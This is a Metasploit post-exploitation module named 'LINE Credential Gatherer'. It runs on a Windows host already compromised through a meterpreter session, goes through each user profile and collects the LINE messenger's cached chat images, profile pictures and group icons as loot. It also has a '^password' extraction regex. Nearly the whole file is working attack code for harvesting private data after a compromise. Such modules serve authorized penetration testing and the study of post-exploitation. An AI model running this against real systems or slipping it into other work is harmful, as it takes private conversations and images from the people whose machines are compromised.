##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
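class MetasploitModule < Msf::Post

  include Msf::Post::File
  include Msf::Post::Windows::UserProfiles
  include Msf::Post::Windows::Packrat

  # Artifact catalogue handed to Msf::Post::Windows::Packrat#run_packrat once
  # per enumerated user profile. Each entry names a profile directory key
  # (`path`, always LocalAppData here), a sub-directory beneath it (`dir`)
  # and a glob for the files to collect (`artifact_file_name`); Packrat does
  # the path resolution, globbing and loot/extraction handling.
  #
  # Every entry in this list is an image cache. Despite the module family's
  # "credential gatherer" naming, nothing here is a password or token: the
  # sensitivity of these files lies in the contact, group and chat imagery
  # they expose, so handle the resulting loot under the engagement's rules.
  #
  # Only the outer hash is frozen (`.freeze` is shallow); the nested hashes
  # and array remain mutable, so treat the whole structure as read-only.
  ARTIFACTS =
    {
      application: 'line',
      app_category: 'chats',
      gatherable_artifacts: [
        {
          filetypes: 'images',
          path: 'LocalAppData',
          dir: 'LINE',
          artifact_file_name: '*.png',
          description: 'Image cache with png extension',
          credential_type: 'chat_log'
        },
        {
          filetypes: 'images',
          path: 'LocalAppData',
          dir: 'LINE',
          artifact_file_name: '*.jpeg',
          description: 'Image cache for jpg cache',
          credential_type: 'chat_log'
        },
        {
          filetypes: 'images',
          path: 'LocalAppData',
          dir: 'LINE\\Cache\\p',
          artifact_file_name: '*',
          description: 'Image cache for profile images of users',
          credential_type: 'chat_log'
        },
        {
          filetypes: 'images',
          path: 'LocalAppData',
          dir: 'LINE\\Cache\\g',
          artifact_file_name: '*',
          description: 'Image cache for group icons',
          credential_type: 'chat_log'
        },
        {
          filetypes: 'images',
          path: 'LocalAppData',
          dir: 'LINE\\Cache\\m',
          artifact_file_name: '*',
          description: 'Image cache for images sent through chat',
          credential_type: 'chat_log'
        },
        {
          filetypes: 'images',
          path: 'LocalAppData',
          dir: 'LINE\\Cache\\e',
          artifact_file_name: '*',
          description: 'Image cache for profile images sent by official accounts',
          credential_type: 'chat_log'
        },
        # NOTE(review): this description duplicates the LINE\Cache\p entry
        # above; confirm what LINE actually stores under Data\pizza and
        # give it a distinct description if it differs.
        {
          filetypes: 'images',
          path: 'LocalAppData',
          dir: 'LINE\\Data\\pizza',
          artifact_file_name: '*',
          description: 'Image cache for profile images of users',
          credential_type: 'chat_log'
        }
      ]
    }.freeze

  # Module metadata and operator options.
  #
  # The description states what the ARTIFACTS list actually collects (image
  # caches), rather than implying that passwords are recovered.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'LINE Credential Gatherer',
        'Description' => %q{
          This module collects artifacts left on disk by the LINE desktop
          application on a Windows host: cached message images and the
          profile, group and official-account icons stored under each user's
          LocalAppData\LINE directory. LINE is the most popular Instant
          Messenger app in Japan.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Kazuyoshi Maruta',
          'Daniel Hallsworth',
          'Barwar Salim M',
          'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
        ],
        'Platform' => ['win'],
        'SessionTypes' => ['meterpreter'],
        'Notes' => {
          # Read-only file collection from the target; no writes to the host.
          'Stability' => [CRASH_SAFE],
          'Reliability' => [],
          'SideEffects' => []
        }
      )
    )

    register_options(
      [
        # Consumed by Packrat's EXTRACT_DATA pass. Presumably it is matched
        # per line against text artifacts (hence the `^` anchor); since every
        # artifact declared above is an image, it is unlikely to match
        # anything for this module -- confirm against Packrat before relying
        # on it.
        OptRegexp.new('REGEX', [false, 'Match a regular expression', '^password']),
        OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
        OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
        # Enumerates the selectable values from the `filetypes` declared in
        # ARTIFACTS (plus 'All'), so the option stays in sync with the list.
        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
      ]
    )
  end

  # Entry point: echo the operator's filter selections, then sweep each
  # enumerated Windows user profile on the target for the artifacts in
  # ARTIFACTS.
  #
  # An empty profile list is reported as a warning instead of being passed
  # over silently, because "sweep completed" with zero profiles is almost
  # always a privilege or enumeration problem the operator should look at.
  def run
    print_status('Filtering based on these selections: ')
    print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")
    print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")
    print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")

    profiles = grab_user_profiles
    print_warning('No user profiles were enumerated on this host; nothing to sweep') if profiles.empty?

    # Packrat resolves `path`/`dir` against each profile and applies the
    # ARTIFACTS / STORE_LOOT / EXTRACT_DATA / REGEX options itself.
    profiles.each do |userprofile|
      run_packrat(userprofile, ARTIFACTS)
    end

    print_status 'PackRat credential sweep completed'
  end
end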